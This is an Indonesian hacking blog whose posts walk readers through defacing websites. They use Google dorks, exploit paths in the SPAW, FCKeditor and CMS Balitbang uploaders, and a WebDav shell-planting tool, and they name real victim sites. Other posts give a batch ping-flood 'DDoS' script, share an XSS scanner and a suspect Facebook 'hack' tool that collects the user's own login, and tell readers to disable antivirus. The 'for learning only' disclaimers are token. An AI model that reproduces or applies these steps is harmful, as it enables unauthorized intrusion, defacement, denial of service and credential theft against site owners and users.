Tuesday, May 14, 2013

0 Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Cara Deface Website Dengan Webdav Shell Maker | Cirebon-Cyber4rt - Malam sob, ngga terasa sudah lama ngga posting tentang hacking hehee. Ada beberapa hal yang membuat saya vacum dari dunia blog selama hampir 2 bulan ini. Selain jadwal jumpa fans yang padat, saya juga sedang fokus untuk masuk perguruan tinggi.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7
Webdav Shell Maker

Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :
Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

4). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

5). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

6). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

7). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

8). Pilih scipt .html deface'an kamu, kemudian klik Upload!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

9). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

10). Enter dan lihat hasilnya!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!

Kalo menurut saya jangan nyerang Index nya deh, kasian adminnya... mending nitip file .html aja, kalo emang kamu hati nurani :p

Tidak semua website rentan atau mempunyai celah/vuln, jadi kalo belum berhasil... cari website lain yang bisa ditanami shell dengan tools ini, jika ingin praktis berikut List Website Vuln Terhadap WebDav. Jika masih ada yang belum dipahami, kalian bisa hubungi via facebook atau mention twitter saya.

Catatan:
Matikan Anti-virus ketika mendownload dan pada saat menggunakan tools WebDav ini, Anti-virus mendeteksi tools ini sebagai virus.

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Webdav Shell Maker | Hmei7 semoga dapat bermanfat bagi kalian, wassalam.

Monday, April 8, 2013

0 Tutorial Deface Website CMS Balitbang Kemendiknas

Cara Deface Website CMS Balitbang Kemendiknas | Cirebon-Cyber4rt - Malem sob, jumpa lagi dengan saya admin ganteng KW 1 wwkwkw =D pada hari ini saya akan menulis sebuah tutorial deface pada web berbasis CMS Balitbang.

Tutorial Deface Website CMS Balitbang Kemendiknas
CMS Balitbang Kemendiknas 3.42

Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.

Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r .Mari kita simak secara seksama. Cekibroott !

CMS Balitbang Kemendiknas 3.42
Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Exploit :
http://public_html/dir/editor/filemanager/connectors/test.html

1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
Tutorial Deface Website CMS Balitbang Versi 3.42

3). Tampilan awal web target.
Tutorial Cara Deface Website CMS Balitbang 3.42

4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.
Tutorial Cara Deface Website CMS Balitbang 3.42

5). Maka nanti tampilannya akan seperti ini :
Tutorial Cara Deface Website CMS Balitbang 3.42

6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target.
Tutorial Cara Deface Website CMS Balitbang 3.42

Catatan :
File yang bisa disisipkan hanya file yang berekstensi .txt

7). Jika file sukses terupload, maka akan tampil seperti dibawah ini.
Tutorial Cara Deface Website CMS Balitbang 3.42

8). Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...
Tutorial Cara Deface Website CMS Balitbang 3.42

Catatan :
File akan berada disini, Contoh : http://target.com/userfiles/file/Nama_File.txt

Gimana, mudahkan caranya? Sekian dulu tutorial dari saya kali ini, kalau ada yang bisa edit supaya bisa upload shell.php kasih tau ane yak wkwk :p

Dan saya minta maaf kalau kebanyakan web yang dijadikan target adalah website Indonesia, karena umumnya website-website sekolah di Indonesia menggunakan CMS Balitbang ini :'(

Satu lagi, saya mohon maaf kalo hanya bisa deface tapi tidak bisa patching, soalnya ngga ada yang ngajarin bijimane cara protectnya :'(

Wassalam.

Friday, January 4, 2013

0 Free Download Tools Hacking "XSS Scanner Version 1.0"

Free Download Tools Hacking "XSS Scanner Version 1.0" | Cirebon-Cyber4rt - Kali ini saya akan share sebuah tools kecil namun kemampuannya sangat besar. Dulu saya pernah posting tentang website PLN yang saya sisipi script code diurlnya.

XSS Scanner Version 1.0
XSS Scanner v1.0

Nah, kali ini saya akan share sebuah tools untuk mencari web yang vuln terhadap serangan XSS atau Cross-site Scripting. Nama toolsnya XSS Scanner v1.0.

Download Link :
Cara Penggunaan :
1. Buka XSS Scanner v.10
2. Masukan Dork kemudian klik Google
Free Download Tools Hacking "XSS Scanner Version 1.0"

3. Tunggu hingga proses scanning selesai,
Free Download Tools Hacking "XSS Scanner Version 1.0"

4. Lihat dikolom Vulnerables sites, itulah website yang memiliki celah pada XSS-nya.
Free Download Tools Hacking "XSS Scanner Version 1.0"

5. Silahkan dilanjutkan sendiri hehehe =D

Untuk dorknya, didalam file download sudah ada beberapa dork yang bisa kalian gunakan untuk mencari site yang akan discan.

Note :
Sebelum mendownload, sebaiknya matikan dulu Anti-virus di PC kalian. Tools ini terdeteksi sebagai virus, tapi sebenernya aman kok (y)

Ok, itulah tadi postingan saya kali ini yang membahas tentang Tools Hacking "XSS Scanner Version 1.0", semoga dapat bermanfaat toolsnya.

Saturday, December 22, 2012

0 Cara Membuat Tool DDoS Sederhana dari Notepad

Cara Membuat DDoS Sederhana dari Notepad | Cirebon-Cyber4rt - DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.

Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.

1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad

2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)

Sekian saja postingan saya siang ini tentang Cara Membuat Tool DDoS Sederhana dari Notepad, semoga dapat bemanfaat.

Credits: Binus Hacker

Sunday, September 30, 2012

0 Cara Hack Facebook Dengan Tools "Pro Facebook Hack v2.0"

Cara Hack Facebook Dengan Tools "Pro Facebook Hack v2.0" | Cirebon-Cyber4rt - Apa kabar  sobat, ketemu lagi dengan saya, dan diawal bulan yang sangat bersemangat ini saya akan share cara hack akun facebook dengan menggunakan sebuah tools. Nama toolsnya yaitu Pro Facebook Hack v.2.0 buatan Anonymouse & Zmaim.

Entah benar atau tidak worknya tools ini, saya juga belum percaya 100%. Soalnya ketika dicoba di PC saya, awalnya memang bekerja, tapi ketika akan menghack sebuah akun facebook tools ini mengeluarkan notice error. Namun bagi yang penasaran dengan tools hack facebook ini, bisa mendownloadnya dibawah ini.

Screesnhoot :
http://cirebon-cyber4rt.blogspot.com/

http://cirebon-cyber4rt.blogspot.com/

http://cirebon-cyber4rt.blogspot.com/2012/10/cara-hack-facebook-dengan-tools-pro.html

Download Link :
Cara Penggunaan :
  1. Extract dan buka folder Pro Facebook Hack v2.0
  2. Buka file.exe yang iconnya gambar tengkorak.
  3. Klik Enter dan masukan passwordnya starpass2020 lalu Enter lagi.
  4. Pilih menu "Hack Account Facebook"
  5. Kemudian akan muncul form/kotak login,
  6. Masukan email dan password faceboook kalian disitu,
  7. Terakhir tekan "Connexion".
Ketika proses terakhir yaitu Connexion, sebuah notice akan muncul kalau Run-timenya error atau mengalami gangguan. Itu dikarenakan server si pembuat tools hack facebook ini sudah dimatikan atau dengan sebab lain yang lain.

Oleh karena itu saya mohon maaf kalau tools ini tidak dapat bekerja secara sempurna, karena bukan saya yang buat. Saya hanya membagikan tools ini untuk pembelajaran semata. Ok, saya akhiri dan Wassalam.

Monday, August 20, 2012

0 Deface dengan Teknik Remote File Upload Exploit Vulnerability

Deface dengan Teknik Remote File Upload Exploit Vulnerability | Cirebon-Cyber4rt - Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html
We Are Anonymous !

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

2). Pilih salah satu website sebagai target.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

3). Tampilan Webitenya nanti akan seperti ini.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html

http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

8). Lalu klik Send it to the Server.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

http://www.tysk.ee/failid/Image/idulfitri(1).html
http://www.tysk.ee/failid/Image/3xpl0iter.html

Screenshot :
http://cirebon-cyber4rt.blogspot.com/2012/08/deface-dengan-teknik-remote-file-upload.html

Cara sama dengan dengan tutorial yang pernah saya share dulu yaitu Cara Deface Website Melalui Spaw Uploads Vulnerability, hanya saja sedikit berbeda tampilan ketika kita akan mengupload file HMTL.

Sekian postingan saya kali ini tentang Deface dengan Teknik Remote File Upload Exploit Vulnerability, semoga dapat bermanfaat untuk kalian semua.

Credits : Hacker Indonesia

0 Situs yang Dapat Membuat Kamu Serasa Jadi Hacker

Situs yang Dapat Membuat Kamu Serasa Jadi Hacker | Cirebon-Cyber4rt - Sebelum membahas ke postingan, Mumpung masih dalam suasana lebaran juga. Saya mengucapkan Minal 'Aidin Wal Faidzin, Mohon Maaf Lahir dan Batin. Maafin saya ya kalo selama ini pernah berbuat salah sama kalian, entah itu disengaja maupun ndak disengaja :)

http://cirebon-cyber4rt.blogspot.com/2012/08/situs-yang-dapat-membuat-kamu-serasa.html

Ok, sekarang kita lanjut ke topik kita hari ini... yaitu tentang Hacking. Bagi kalian yang suka dengan salah satu topik pembahasan utama blog ini, yaitu hacking, dapat mencoba situs yang saya temukan disalah satu thread Forum Hacking Indonesia "Devilzc0de".

Berikut Situs Websitenya :
Tugas kalian hanyalah mengetikan tombol apa saja pada keyboard, secara otomatis kode-kode yang belum kita kenal akan muncul. Background hitam dan font yang berwarna hijau menghiasi website tersebut.

Screenshotnya :
http://cirebon-cyber4rt.blogspot.com/2012/08/situs-yang-dapat-membuat-kamu-serasa.html
Hacker Typer Screenshot

Hehehe, gimana udah berasa jadi Hacker? yaa... walaupun hanya sebuah rekayasa, tapi yang penting kita udah bisa merasakan jadi seorang hacker :D

Sekian postingan saya kali ini tentang Situs yang Dapat Membuat Kamu Serasa Jadi Hacker, semoga dapat bermanfaat bagi sobat semua.

Tuesday, August 14, 2012

0 Melihat Aksi Para Carder yang Sedang Beraksi

Melihat Aksi Para Carder yang Sedang Beraksi | Cirebon-Cyber4rt - Kalo udah ngomongin soal "Carder" pasti yang pertama terlintas dibenak kita adalah tentang $$$ hahaha =D. Yups, karena carder memang selalu identik dengan kegiatan ilegal pencurian uang melalui kartu ATM, Visa, Web Shop Online dll.

http://cirebon-cyber4rt.blogspot.com/2012/08/melihat-aksi-para-carder-yang-sedang.html
An Carder In Actions

Namun, apakah kalian sudah pernah melihat secara langsung bagaimana para carder tersebut beraksi? Kayanya jarang deh yang tau, karena kalo dikasih bagaimana cara mereka membobol ATM kan bisa berabe... ketangkep pak pulici ntar :p.

Nah, sekarang saya mau kasih bocoran nih... tentang bagaimana para carder melakukan aksinya :D Inilah hasil pengamatan saya pribadi setelah mengelilingi beberapa forum underground Indonesia.

Screenshot Aksi Para Carder yang Sedang Beraksi :

http://cirebon-cyber4rt.blogspot.com/2012/08/melihat-aksi-para-carder-yang-sedang.html

http://cirebon-cyber4rt.blogspot.com/2012/08/melihat-aksi-para-carder-yang-sedang.html

http://cirebon-cyber4rt.blogspot.com/2012/08/melihat-aksi-para-carder-yang-sedang.html

http://cirebon-cyber4rt.blogspot.com/2012/08/melihat-aksi-para-carder-yang-sedang.html

Gimana, sekarang udah tau kan aksi para carder beraksi hahaha :D postingan ini hanya hiburan semata, tidak ada maksud untuk hal lain wkwkw :p.

Ok, Sekian saja postingan saya kali ini tentang Melihat Aksi Para Carder yang Sedang Beraksi, semoga dapat menghibur sobat sekalian. Kalo ga lucu ya maaf, lagian ane juga bukan pelawak kok :p

Saturday, July 21, 2012

0 Cara Deface Website Melalui Spaw Uploads Vulnerability

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html
Cara Deface Website Melalui Spaw Uploads Vulnerability | Cirebon-Cyber4rt - Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

3). Ganti pada Bagian 
/spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

4).
Tekan Enter, Nanti akan Terbuka Seperti Ini :

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.


http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

6). 
Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

7). Selanjutnya Klik Tombol Upload.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

9). Selesai, dan Hasilnya :

http://www.dtam.moph.go.th/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

Source : Hacker Newbie